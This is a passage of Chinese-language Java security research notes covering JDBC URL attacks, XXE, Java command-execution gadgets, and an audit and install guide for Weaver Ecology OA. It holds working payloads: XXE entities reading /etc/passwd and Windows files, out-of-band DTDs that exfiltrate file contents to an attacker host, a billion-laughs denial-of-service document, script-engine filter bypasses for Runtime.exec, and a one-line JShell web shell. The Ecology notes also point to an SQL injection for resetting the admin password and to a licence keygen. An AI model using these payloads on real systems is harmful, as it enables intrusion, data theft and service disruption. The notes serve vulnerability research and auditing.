271 | jdbc:postgresql://localhost/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=ftp://127.0.0.1:2121/bean.xml
272 | ```
273 | 
274 | ### Apache Calcite Avatica
275 | 
276 | SSRF
277 | 
278 | ```
279 | jdbc:avatica:remote:url=https://jdbc-attack.com?file=/etc/passwd;httpclient_impl=sun.security.provider.PolicyFile
280 | ```
281 | 
282 | ### Snowflake
283 | 
284 | ```
285 | jdbc:snowflake://jdbc-attack.com/?user=trganda&passwd=trganda&db=db&authenticator=externalbrowserP
286 | ```
287 | 
288 | > 以上 Poc 可参考 https://github.com/trganda/atkjdbc
289 | 
290 | ## jdbc 攻击-文件读取
291 | 
292 | 这篇文章已经说的很全了，漏洞定位`com.mysql.jdbc.MysqlIO#sendFileToServer`
293 | <https://lorexxar.cn/2020/01/14/css-mysql-chain/#Load-data-infile>
294 | 


--------------------------------------------------------------------------------
/JavaVulType/XXE.md:
--------------------------------------------------------------------------------
  1 | # XXE
  2 | 
  3 | - [XML](#xml)
  4 |   - [DTD](#dtd)
  5 |   - [实体引用](#实体引用)
  6 |   
  7 | - [Java XML解析](#java_xml解析)
  8 |   - [DOM](#dom)
  9 |   - [SAX](#sax)
 10 |   - [JDOM](#jdom)
 11 |   - [DOM4J](#dom4j)
 12 |   
 13 | - [Payloads](#payloads)
 14 |   - [有回显](#有回显)
 15 |   - [无回显](#无回显)
 16 |   - [DDOS](#ddos)
 17 |   - [常见报错](#常见报错)
 18 | 
 19 | ## xml
 20 | 
 21 | XML（eXtensible Markup Language），可扩展的标记语言，所有的标签都可以自定义。XML常被用于配置文件，记录和传递信息。
 22 | 
 23 | 假设`student.xml`文件内容如下
 24 | 
 25 | ```xml
 26 | <?xml version="1.0" encoding="UTF-8"?>  <! --perlog序言-->
 27 | <scores>
 28 |     <student id="1">
 29 |         <name>张三</name>
 30 |         <course>java</course>
 31 |         <score>90</score>
 32 |     </student>
 33 |     <student id="2">
 34 |         <name>李四</name>
 35 |         <course>xml</course>
 36 |         <score>99</score>
 37 |     </student>
 38 | </scores>
 39 | ```
 40 | 
 41 | ### dtd
 42 | 
 43 | DTD（Document Type Definition，文档类型定义）是一组标记声明，为GML、SGML、XML、HTML等标记语言定义文档类型，定义了一种文档约束。从DTD的角度来看，XML包含五部分：`Elements元素、Attributes属性、Entities实体、PCDATA(Parsed Character Data被解析字符数据)、CDATA(Character Data字符数据)`。简单理解PCDATA和CDATA的区别就是PADATA是位于标签中间的数据，需要被xml解析。
 44 | 
 45 | student.xml文件加入对应的内部DTD约束如下：
 46 | 
 47 | ```xml
 48 | <!DOCTYPE scores [ <! --定义根元素-->
 49 |         <!ELEMENT scores (student*) >  <! --定义scores元素包含任意个student元素-->
 50 |         <!ELEMENT student (name, course, score)> <! --定义student元素必须包含三个元素: name course score-->
 51 |         <!ATTLIST student id CDATA #REQUIRED>  <! --ATTLIST声明属性-->
 52 |         <!ELEMENT name (#PCDATA)>
 53 |         <!ELEMENT course (#PCDATA)>
 54 |         <!ELEMENT score (#PCDATA)>
 55 |         ]>
 56 | ```
 57 | 如果想要把DTD约束定义在外部文档中，那么student.xml文档中只需要加入一句`<!ENTITY 实体名称 SYSTEM "URI/URL">`，如下。引入的scores.dtd参照内部DTD约束（但是去除`<!DOCTYPE scores [ `的声明）
 58 | ```
 59 | <!DOCTYPE scores SYSTEM "scores.dtd" >
 60 | ```
 61 | 
 62 | ### 实体引用
 63 | 
 64 | 实体是对数据的引用，例如引用文本或特殊字符变量。实体也分为内部实体和外部实体，外部实体可以理解为定义在其他外部文件中。所有的实体以`&`开头，`;`结尾。上述student.xml中定义name为张三的方式如下
 65 | ```xml
 66 | <student id="1">
 67 |     <name>张三</name>
 68 | </student>
 69 | ```
 70 | 如果改用实体引用的方式，如下
 71 | ```xml
 72 | <! --内部实体-->
 73 | 
 74 | <!ENTITY name "张三">
 75 | <student><name>&name;</name></student>
 76 | 
 77 | <! --外部实体-->
 78 | 
 79 | <!ENTITY name SYSTEM "name.dtd">
 80 | <student><name>&name;</name></student>
 81 | ```
 82 | 
 83 | xml对于有特殊意义的五个字符，已经默认转为实体引用，如下
 84 | 
 85 | ```
 86 | <    &lt;	
 87 | >    &gt;
 88 | &    &amp;	
 89 | '    &apos;	
 90 | "    &quot;
 91 | ```
 92 | 
 93 | 
 94 | ## java_xml解析
 95 | 
 96 | Java解析XML的方式主要有四种：DOM(Document Object Model)、SAX(Simple API for XML)、JDOM(Java Document Object Model)和DOM4J。
 97 | 
 98 | ### dom
 99 | 
100 | DOM一次性读取XML，并在内存中表示为树形结构，包括：`DOCUMENT_NODE、ELEMENT_NODE、ATTRIBUTE_NODE`等节点，分别表示整个XML文档、XML元素、XML元素的属性等。可参考：https://www.w3.org/TR/2004/REC-DOM-Level-3-Core-20040407/introduction.html
101 | 
102 | ```java
103 | import org.w3c.*;
104 | import javax.xml.parsers.*;
105 | 
106 | File f=new File("student.xml");
107 | DocumentBuilderFactory factory=DocumentBuilderFactory.newInstance();
108 | DocumentBuilder builder=factory.newDocumentBuilder();
109 | Document doc=builder.parse(f); // 可以接收InputStream，File或者URL
110 | 
111 | NodeList n=doc.getElementsByTagName("student");
112 | System.out.println(doc.getElementsByTagName("name").item(0).getFirstChild().getNodeValue());
113 | ```
114 | 
115 | 
116 | ### sax
117 | 
118 | SAX基于流的解析方式边读XML边解析，并以事件回调的方式返回数据，所以在解析函数中需要传入一个继承自`DefaultHandler`的回调对象。包含`startDocument()、startElement()、characters()、endElement()`等事件。分别表示开始读取xml文档、读取到元素<student>、读取到字符、读取到结束元素</student>等。
119 | 
120 | ```java
121 | import javax.xml.parsers.*;
122 | 
123 | File f=new File("student.xml");
124 | SAXParserFactory saxParserFactory=SAXParserFactory.newInstance();
125 | SAXParser saxParser=saxParserFactory.newSAXParser();
126 | MyHandler dh = new MyHandler();
127 | saxParser.parse(f, dh); // 需要传入一个回调函数，解析过程中的处理取决于回调函数
128 | ```
129 | 
130 | ### jdom
131 | 
132 | DOM是与平台和语言无关的方式表示XML文档的官方标准。JDOM则是在DOM基础上开发的针对Java的扩展。
133 | 
134 | ```java
135 | import org.jdom.*;
136 | 
137 | File f=new File("student.xml");
138 | SAXBuilder builder=new SAXBuilder();
139 | Document document=builder.build(f);
140 | 
141 | List Nodelists=document.getRootElement().getChildren();
142 | for (int i=0;i<Nodelists.size();i++){
143 |     System.out.println(((Element)(Nodelists.get(i))).getChild("name").getText());
144 | }
145 | ```
146 | 
147 | ### dom4j
148 | 
149 | DOM4J是JDOM的一个分支，提供了更大的灵活性。Hibernate就采用DOM4J来读取配置文件
150 | 
151 | ```java
152 | import org.dom4j.*;
153 | 
154 | File f=new File("student.xml");
155 | SAXReader reader=new SAXReader();
156 | Document document=reader.read(f);
157 | 
158 | Iterator i=document.getRootElement().elementIterator();
159 | while (i.hasNext()) {
160 |     Element foo = (Element) i.next();
161 |     System.out.println(foo.getName() + "=" + foo.getStringValue());
162 | }
163 | ```
164 | 
165 | ## payloads
166 | ### 有回显
167 | 有回显，可以用file或者netdoc协议读取文件
168 | ```xml
169 | <?xml version="1.0" encoding="utf-8"?>
170 | <!DOCTYPE creds [
171 |         <!ELEMENT creds ANY>
172 |         <!ENTITY xxe SYSTEM "file:///etc/passwd">   <! --或为"file:///c:/windows/system.ini"-->
173 |         ]>
174 | <creds>&xxe;</creds>
175 | ```
176 | 有回显，且读取的文件包含特殊字符，用CDATA包住文本避免被解析。
177 | ```xml
178 | <! --payload.xml-->
179 | 
180 | <?xml version="1.0" encoding="utf-8"?>
181 | <!DOCTYPE creds [
182 |         <!ENTITY % start "<![CDATA[">
183 |         <!ENTITY % goodies SYSTEM "file:///c:/windows/system.ini">
184 |         <!ENTITY % end "]]>">
185 |         <!ENTITY % dtd SYSTEM "evil.dtd"> %dtd; ]>
186 | 
187 | <creds>&all;</creds>
188 | 
189 | <! --evil.dtd-->
190 | 
191 | <?xml version="1.0" encoding="UTF-8"?>
192 | <!ENTITY all "%start;%goodies;%end;">
193 | ```
194 | ### 无回显
195 | 无回显，用http或ftp协议外带数据。但内部Entity中禁止引用参数实体，所以DTD中要把`%`转义成`&#37;`
196 | ```xml
197 | <! --payload.xml-->
198 | 
199 | <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ip:port/evil.dtd">%remote;%int;%send;]>
200 | 
201 | <! --ftp下的evil.dtd-->
202 | 
203 | <!ENTITY % file SYSTEM "file:///C:\Windows\win.ini">
204 | <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://evilip:port/%file;'>">
205 | 
206 | <! --http下的evil.dtd-->
207 | 
208 | <!ENTITY % file SYSTEM "file:///C:\Windows\win.ini">
209 | <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://evilip:port/?p=%file;'>">
210 | ```
211 | python起http或ftp服务
212 | ```
213 | python3 -m http.server 8080
214 | python3 -m pyftpdlib -p 8081
215 | ```
216 | 
217 | ### ddos
218 | ```xml
219 | <?xml version="1.0"?>
220 |      <!DOCTYPE lolz [
221 |      <!ENTITY lol "lol">
222 |      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
223 |      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
224 |      <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
225 |      <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
226 |      <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
227 |      ]>
228 |      <lolz>&lol6</lolz>
229 | ```
230 | 
231 | 
232 | ### 常见报错
233 | **（1）内部参数实体引用**
234 | ```
235 |  The entity name must immediately follow the '%' in the parameter entity reference
236 |  
237 |  The character reference must end with the ';' delimiter
238 | ```
239 | 这两个报错常见于在`evil.dtd`中。问题在于将`"<!ENTITY &#37; send SYSTEM 'ftp://evilip:port/%file;'>">`的`&#37;`写成了`%`
240 | 如果我们把a.txt换成windows下的敏感文件，如<!ENTITY % file SYSTEM "file:///c:/windows/system.ini">，java会报错Exception in thread "main" java.net.MalformedURLException: Illegal character in URL，这是因为敏感文件中可能存在特殊字符，造成编码问题。
241 | 
242 | **（2）协议不支持/编码问题**
243 | ```
244 | java.net.MalformedURLException: no protocol
245 | ```
246 | 出现这个报错的可能性包括用了`expect`这种Java不支持的协议，或者编码存在问题，需要设定编码格式如下。
247 | ```
248 | Document doc = builder.parse(new InputSource(new ByteArrayInputStream(send.getBytes("utf-8"))));  
249 | ```
250 | 
251 | **（3）xml格式存在问题**
252 | ```
253 | The markup declarations contained or pointed to by the document type declaration must be well-formed
254 | ```
255 | 文档类型声明可能存在错误例如`<?xml version="1.0" encoding="utf-8"?><!DOCTYPE ...`闭合不完整
256 | 
257 |  
258 | 
259 | 


--------------------------------------------------------------------------------
/JavaVulType/常见利用类.md:
--------------------------------------------------------------------------------
  1 | ## 常见利用类
  2 | 
  3 | ### 命令执行
  4 | ```
  5 | （1）java.lang.Runtime
  6 | （2）java.lang.ProcessBuilder
  7 | （3）java.lang.ProcessImpl
  8 | （4）javax.script.ScriptEngineManager
  9 | （5）java.beans.Expression
 10 | （6）java.beans.Statement
 11 | （7）javax.el.ELProcessor（Tomcat EL）
 12 | （8）javax.el.ELManager （Tomcat EL）
 13 | OGNL(Struts2)，SpEL(Spring)
 14 | （9）JShell
 15 | （10）MVEL
 16 | ```
 17 | 
 18 | ### 类加载
 19 | ```
 20 | （1）java.langClassLoader #loadClass #findClass #defineClass（自定义类加载）
 21 | （2）java.net.URLClassLoader #newInstance #loadClass
 22 | （3）jdk.nashorn.internal.runtime.ScriptLoader #installClass
 23 | （4）java.lang.reflect.Proxy #defineClass0
 24 | （5）com.sun.org.apache.bcel.internal.util.ClassLoader #loadClass
 25 | （6）com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl（BeanComparator、EqualsBean/ToStringBean可以间接调用TemplatesImpl）
 26 | （7）java.util.ServiceLoader$LazyIterator / com.sun.xml.internal.ws.util.ServiceFinder$LazyIterator （配合BCEL）
 27 | （8）com.sun.rowset.JdbcRowSetImpl #connect/#prepare/#getDatabaseMetaData/#setAutoCommit
 28 | ```
 29 | 
 30 | ### 反射调用
 31 | ```
 32 | （1）javax.imageio.ImageIO$ContainsFilter
 33 | （2）java.beans.EventHandler
 34 | （3）com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection
 35 | // 非JDK自带
 36 | （4）org.codehaus.groovy.runtime.MethodClosure
 37 | （5）org.codehaus.groovy.runtime.ConvertedClosure
 38 | （6）groovy.util.Expando
 39 | ```
 40 | 
 41 | ### SSRF
 42 | ```
 43 | （1）java.net.URL#openConnection
 44 | ```
 45 | 
 46 | ### 使用说明
 47 | #### 命令执行
 48 | ```
 49 | #（1）java.lang.Runtime
 50 |     Runtime.getRuntime.exec("calc.exe")
 51 |     
 52 | #（2）java.lang.ProcessBuilder
 53 |     String[] cmd = new String[]{"open","-a","/System/Applications/Calculator.app"};
 54 |     ProcessBuilder processBuilder = new ProcessBuilder(cmd);
 55 |     Process process = processBuilder.start();
 56 |     
 57 | #（3）java.lang.ProcessImpl (构造方法是private的，无法直接new)
 58 |     String [] cmd={"cmd","/c","whoami"};
 59 |     Class processimpl=Class.forName("java.lang.ProcessImpl");
 60 |     Method m1=processimpl.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
 61 |     m1.setAccessible(true);
 62 |     Process p=(Process) m1.invoke(processimpl,cmd,null,null,null,false);
 63 |     
 64 | #（4）javax.script.ScriptEngineManager（JDK1.6引入，用于解析javascript）
 65 |     ScriptEngineManager manager = new ScriptEngineManager(null);
 66 |     ScriptEngine engine = manager.getEngineByName("js");
 67 |     String script="java.lang.Runtime.getRuntime().exec(\"calc\")";
 68 |     engine.eval(script);
 69 |     
 70 |     # 一些绕过
 71 |     String script="java.lang./****/Runtime.getRuntime().exec(\"calc\")";
 72 |     String script="var x=new Function('return'+'(new java.'+'lang.ProcessBuilder)')();  x.command(\"calc\"); x.start();";
 73 |     new javax.script.ScriptEngineManager().getEngineByName("js").eval("var a = test(); function test() { var x=java.lang."+"Runtime.getRuntime().exec(\"calc\");};");
 74 |     String script="var x=java.\u2028lang.Runtime.getRuntime().exec(\"calc\");";
 75 |     String script="var x=java.\u2029lang.Runtime.getRuntime().exec(\"calc\");";
 76 |     String script="var x=java.lang.//\nRuntime.getRuntime().exec(\"calc\");";
 77 |     
 78 | #（5）java.beans.Expression
 79 |     Expression expression=new Expression(Runtime.getRuntime(),"exec",new Object[]{"calc"});
 80 |     expression.getValue();
 81 |     
 82 | #（6）java.beans.Statement
 83 |     Statement statement=new Statement(Runtime.getRuntime(),"exec",new Object[]{"calc"});
 84 |     statement.execute();
 85 |     
 86 | #（7）javax.el.ELProcessor（Tomcat EL）
 87 |     String script= "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='"+cmd+"';java.lang.Runtime.getRuntime().exec(exp);\")";
 88 |     ELProcessor elProcessor = new ELProcessor();
 89 |     Process process = (Process) elProcessor.eval(script);
 90 |     
 91 | #（8）javax.el.ELManager （Tomcat EL）
 92 |     String script= "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='calc';java.lang.Runtime.getRuntime().exec(exp);\")";
 93 |     ELManager elManager=new ELManager();
 94 |     ELContext elContext=elManager.getELContext();
 95 |     ExpressionFactory expressionFactory=ELManager.getExpressionFactory();
 96 |     ValueExpression valueExpression=expressionFactory.createValueExpression(elContext,"${"+script+"}",Object.class);
 97 |     valueExpression.getValue(elContext);
 98 |     
 99 | #（9）JShell
100 |     <%=jdk.jshell.JShell.builder().build().eval(request.getParameter("cmd"))%>
101 | 
102 | #（10）MVEL
103 |     ShellSession shellSession=new ShellSession();
104 |     shellSession.exec("push Runtime.getRuntime().exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator');");
105 |     
106 |     # 支持的命令
107 |       "help" -> {Help@605} 
108 |       "exit" -> {Exit@607} 
109 |       "cd" -> {ChangeWorkingDir@609} 
110 |       "set" -> {Set@611} 
111 |       "showvars" -> {ShowVars@613} 
112 |       "ls" -> {DirList@614} 
113 |       "inspect" -> {ObjectInspector@616} 
114 |       "pwd" -> {PrintWorkingDirectory@618} 
115 |       "push" -> {PushContext@620} 
116 | ```
117 | 
118 | #### 类加载
119 | ```
120 | #（1）com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl（BeanComparator、EqualsBean/ToStringBean可以间接调用TemplatesImpl）
121 |     TemplatesImpl.getOutputProperties()
122 |       TemplatesImpl.newTransformer()
123 |         TemplatesImpl.getTransletInstance()
124 |           TemplatesImpl.defineTransletClasses()
125 |             ClassLoader.defineClass()
126 |               Class.newInstance()
127 |               
128 | # （2）com.sun.rowset.JdbcRowSetImpl #connect/#prepare/#getDatabaseMetaData/#setAutoCommit最终都是调用的connect()，如下
129 |     private Connection connect() throws SQLException { // 无参方法
130 |         DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
131 |     }
132 | ```
133 | 
134 | #### 反射调用
135 | ```
136 | #（1）javax.imageio.ImageIO$ContainsFilter
137 |     public boolean filter(Object elt) {
138 |         return contains((String[])method.invoke(elt), name); // 传入Object对象，要求方法无参，所以不能采用Runtime.exec(cmd)这种需要传参的命令执行方法，而是采用ProcessBuilder.start()等无参方法
139 |     }
140 |     
141 | #（2）java.beans.EventHandler
142 |     private Object invokeInternal(Object proxy, Method method, Object[] arguments) {
143 |       String methodName = method.getName();
144 |       if (method.getDeclaringClass() == Object.class)  { // 如果方法是hashCode、equals、toString其中一个，采用代理，走不到invoke
145 |           // Handle the Object public methods.
146 |           if (methodName.equals("hashCode"))  {
147 |               return new Integer(System.identityHashCode(proxy));
148 |           } else if (methodName.equals("equals")) {
149 |               return (proxy == arguments[0] ? Boolean.TRUE : Boolean.FALSE);
150 |           } else if (methodName.equals("toString")) {
151 |               return proxy.getClass().getName() + '@' + Integer.toHexString(proxy.hashCode());
152 |           }
153 |       }
154 |      ... // 参数要么是空，要么是单个参数
155 |      return MethodUtil.invoke(targetMethod, target, newArgs); // 反射调用
156 |    }
157 |    
158 | #（3）com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection   
159 |    public ValueT get(BeanT bean) throws AccessorException {
160 |        return this.getter.invoke(bean); // 只能传入类对象，无法传入参数，要求反射方法无参
161 |    }
162 |    
163 | #（4）org.codehaus.groovy.runtime.MethodClosure
164 |     protected Object doCall(Object arguments) {
165 |         return InvokerHelper.invokeMethod(this.getOwner(), this.method, arguments);
166 |     }
167 |     
168 | #（5）org.codehaus.groovy.runtime.ConvertedClosure
169 |     public abstract class ConversionHandler implements InvocationHandler, Serializable { // 实现了InvocationHandler，并重写了invoke方法，如果执行Proxy.newProxyInstance就会调用这个Invoke
170 |         public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
171 |             this.invokeCustom(proxy, method, args); // 如果传入的method不是Object对象中的方法（如hashcode、toString等），就执行此步，进行反射调用
172 |         }
173 |     }
174 |     
175 | #（6）groovy.util.Expando
176 |     public int hashCode() {
177 |         Object method = this.getProperties().get("hashCode");
178 |         if (method != null && method instanceof Closure) { // 如果properties中存在一个键为hashCode，值为Closure的子类，进入if
179 |             Closure closure = (Closure)method;
180 |             closure.setDelegate(this);
181 |             Integer ret = (Integer)closure.call(); //反射调用
182 |             return ret;
183 |         } ...
184 |     }
185 |     
186 |     # 触发demo
187 |       Map map = new HashMap<Expando, Integer>();
188 |       Expando expando = new Expando();
189 |       String[] cmd = new String[]{"open","-a","/System/Applications/Calculator.app"};
190 |       MethodClosure methodClosure = new MethodClosure(new java.lang.ProcessBuilder(cmd), "start");
191 |       expando.setProperty("hashCode", methodClosure);
192 |       map.put(expando, 123);
193 |       expando.hashCode();
194 | ```
195 | 
196 | 


--------------------------------------------------------------------------------
/Java_OA/Ecology9_install.md:
--------------------------------------------------------------------------------
 1 | # 安装说明
 2 | 
 3 | ### 1. 安装包 ###
 4 | ```
 5 | Ecology_setup_forWindows_v2.61.exe
 6 | Ecology9.00.1907.04.zip
 7 | Resin-4.0.58.zip
 8 | Ecology9注册机.exe
 9 | ```
10 | ### 2. 安装前提 ###
11 | Windows Server + Sql Server
12 | 
13 | ### 3. 安装步骤 ###
14 | 
15 | （1）更改hosts  
16 | 为避免泛微自动更新，在windows配置文件`C:\Windows\System32\drivers\etc\`末尾增加如下内容。将泛微的更新地址指向本地。此步骤可选。
17 | ```
18 | 127.0.0.1 update.e-cology.cn
19 | 127.0.0.1 www.weaver.com.cn
20 | ```
21 | 
22 | （2）运行Ecology_setup_forWindows_v2.61.exe  
23 | 运行exe，选择全新安装，此步骤将Ecology和Resin压缩包解压到当前目录下  
24 | 
25 | （3）配置、启动Resin  
26 | 运行Resin目录下的setup.exe，创建服务。查看Resin目录下的resinstart.bat文件中Java的路径是否为Windows下配置的Java的路径，如果不是进行更改。运行resinstart.bat。  
27 | 
28 | （4）访问localhost:ip  
29 | ip是第二步中配置的ip，默认为80。访问之后会进入到数据库配置界面。验证码一般为`wEAver2018`。在sql server数据库中创建名为ecology的数据库。然后回到数据库配置界面，点击初始化数据库。初始化完成后根据页面提示信息，重启Resin。  
30 | 
31 | （5）登入系统  
32 | localhost:ip进入系统。会跳转到登陆界面。点击登录后可能弹出license验证。license验证时将识别码放入Ecology9.exe注册机中生成license文件，导入。验证码处依旧填入`wEAver2018`。验证success后。输入管理员用户名`sysadmin`，密码位于数据表`HrmResourceManager`，值md5加密方式。  
33 | 
34 | ### 4. 其他问题 ###
35 | 
36 | （1）jsp编译报错  
37 | 如果没有能进入到登陆界面，一直显示加载中。并且在命令行终端看到jsp编译报错。查看Resin目录，`conf/resin.xml`中的以下内容所设路径正确，`javac compiler`路径和`root-directory`需要和系统中的配置保持一致。用Ecology_setup_forWindows_v2.61.exe生成的可能有误。
38 | 
39 | ```
40 | <javac compiler="C:\Program Files\Java\jdk1.8.0_65\bin\javac" args="-encoding UTF-8"/>
41 | 
42 | <web-app id="/" root-directory="C:\Users\Administrator\Desktop\e9\ecology">
43 |   <servlet-mapping url-pattern='/weaver/*' servlet-name='invoker'/>
44 |   <form-parameter-max>100000</form-parameter-max>
45 | </web-app>
46 | ```
47 | 


--------------------------------------------------------------------------------
/Java_OA/EcologyAudit.md:
--------------------------------------------------------------------------------
  1 | ## 泛微Ecology ##
  2 | 
  3 | ### (1) 漏洞指纹 ###
  4 | `Set-Cookie: ecology_JSessionId=`
  5 | 
  6 | ### (2) 调试方法 ###  
  7 | Resin目录下/conf/resin.properties文件中找到`jvm_args`参数，在参数值中加入
  8 | ```
  9 | -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
 10 | ```
 11 | 
 12 | ### (3) 关键数据 ###
 13 | * 环境安装验证码: `/ecology/WEB-INF/code.key`文件中        
 14 | * 管理员账号: 位于数据表`HrmResourceManager`，密码为`md5`加密，无法解码的情况下，可通过`/api/ec/dev/locale/getLabelByModule`路径的sql注入漏洞修改密码     
 15 | * 环境信息查看: 访问`http://ip:port/security/monitor/Monitor.jsp`，包含操作系统版本、ecology版本、web中间件版本、JVM版本、客户端软件和规则库版本
 16 | * 编译后的class文件: `/ecology/classbean/ `文件夹下
 17 | * 系统运行依赖的jar: `/ecology/WEB-INF/lib/` 文件夹下
 18 | 
 19 | ### (4) 路由特点 ###
 20 | （1）`/weaver`    
 21 | 服务器为resin，查看resin.xml。它配置了invoker servlet，即一种默认访问servlet的方式，可以运行没有在web.xml中配置的servlet。访问路径为`/weaver/*`，`*`后是被访问的Java类，该类需要满足两个要求 a.采用完全限定名 b.实现servlet或HttpServlet相关接口。
 22 | ```
 23 | <web-app id="/" root-directory="C:\Users\Administrator\Desktop\Ecology1907\ecology">
 24 |     <servlet-mapping url-pattern='/weaver/*' servlet-name='invoker'/>
 25 |     <form-parameter-max>100000</form-parameter-max>
 26 | </web-app>
 27 | ```
 28 | 所以lib目录下的bsh-2.0b4.jar可以按照全限定类名`/bsh.servlet.BshServlet`访问`BshServlet`类，该类实现了`HttpServlet`接口
 29 | ```
 30 | public class BshServlet extends HttpServlet {
 31 |     public void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
 32 |         String var3 = var1.getParameter("bsh.script");
 33 |         ...
 34 |         var8 = this.evalScript(var3, var10, var7, var1, var2);
 35 |     }
 36 | }
 37 | ```
 38 | `/ecology/classbean/`目录下均为Java类，想要访问该目录下的类都采用`/weaver`的方式
 39 | 
 40 | （2）`/xx.jsp`     
 41 | jsp访问路径均为ecology根目录到该jsp的路径，例如jsp的绝对路为`D:/ecology/addressbook/AddressBook.jsp`，那么该jsp的访问路径为`http://ip:port/addressbook/AddressBook.jsp`
 42 | 
 43 | （3）`/services/*`        
 44 | `/services/*`的服务配置由`org.codehaus.xfire.transport.http.XFireConfigurableServlet`读取`classbean/META-INF/xfire/services.xml`文件进行加载创建。配置文件各服务节点结构大致如下
 45 | ```xml
 46 |     <service> 
 47 |         <name>DocService</name>  
 48 |         <namespace>http://localhost/services/DocService</namespace>  
 49 |         <serviceClass>weaver.docs.webservices.DocService</serviceClass>  
 50 |         <implementationClass>weaver.docs.webservices.DocServiceImpl</implementationClass>  
 51 |         <serviceFactory>org.codehaus.xfire.annotations.AnnotationServiceFactory</serviceFactory> 
 52 |     </service>
 53 | ```
 54 | 那么可以通过`/services/DocService`的方式访问该接口。
 55 | 
 56 | （4）`/api/*`     
 57 | 由`@Path`注解定义的一系列`REST`接口，可以在`ecology/WEB-INF/Api.xls`文件中查看所有的`api`接口路径和相关类。泛微E9版本开始新增了/api路由，在旧版本中，该路由存在大小写绕过鉴权的漏洞。
 58 | 
 59 | （5）`/*.do`      
 60 | 由实现了`weaver.interfaces.workflow.action.Action`接口的`action`，由ecology/WEB-INF/service/\*.xml所配置
 61 | ```xml
 62 | <action path="/getProcess" type="com.weaver.action.EcologyUpgrade" parameter="getProcess" >
 63 | </action>
 64 | ```
 65 | 可通过/<path>.do的方式访问。
 66 | 
 67 | ### (5) 安全策略 ###
 68 | 
 69 | 安全过滤器(防火墙)
 70 | ```xml
 71 | <filter>
 72 |     <filter-name>SecurityFilter</filter-name>
 73 |     <filter-class>weaver.filter.SecurityFilter</filter-class>
 74 | </filter>
 75 | <filter-mapping>
 76 |     <filter-name>SecurityFilter</filter-name>
 77 |     <url-pattern>/*</url-pattern>
 78 | </filter-mapping>
 79 | ```
 80 | 
 81 | 安全策略的具体内容分为两种，规则形式的`xml`文件（位于`WEB-INF/securityRule`），和实现`weaver.security.rules.BaseRule`接口的类（位于`WEB-INF/myclasses/weaver/security/rules/ruleImp`）。      
 82 | 
 83 | 安全策略的加载位于`SecurityMain#initFilterBean`方法，加载顺序如下
 84 | 
 85 | * 加载WEB-INF/weaver_security_config.xml
 86 | * 加载WEB-INF/weaver_security_rules.xml
 87 | * 加载WEB-INF/securityRule/{Ecology_Version}/*.xml，并将这些文件作为参数调用ruleImp中实现了BaseRule接口的自定义规则的init函数
 88 | * 从数据库表weaver_security_rules中加载（如果配置文件中fromDB=db）
 89 | * 调用ruleImp中实现了BaseRule接口的自定义规则的initConfig函数
 90 | * 加载WEB-INF/securityRule/Rule/*.xml
 91 | * 加载WEB-INF/securityXML/*.xml
 92 | 
 93 | 安全补丁的日志: `/ecology/WEB-INF/securitylog`   
 94 | 
 95 | 安全策略生效特征:
 96 | 
 97 | (1) URL访问404，响应头部包含`errorMsg: securityIntercept`
 98 | 
 99 | (2) 访问后弹窗，提示登录或出错，或响应体中包含`<script type='text/javascript'>try{top.location.href='/login/Login.jsp?af=1&_token_=`
100 | 
101 | 参数名称过滤策略
102 | 
103 | `ecology/WEB-INF/securityRule/Rule/weaver_security_custom_rules_for_20180411.xml`
104 | ```
105 | <param-key>^(?!.*(&lt;|&gt;|&amp;|'|"|\(|\)|\r|\n|%0D%0A)).*$</param-key>
106 | ```
107 | 
108 | SQL注入过滤策略       
109 | `/ecology/WEB-INF/securityRule/Rule/weaver_security_for_sqlinjection_rules.xml`
110 | ```
111 | <rules>
112 |     <!--破坏性sql语句检查-->
113 |     <rule>exec[^a-zA-Z]|insert[^a-zA-Z]into[^a-zA-Z].*?values|delete[^a-zA-Z].*?from|update[^a-zA-Z].*?set|truncate[^a-zA-Z]</rule>
114 |     <!--常见注入字符检查-->
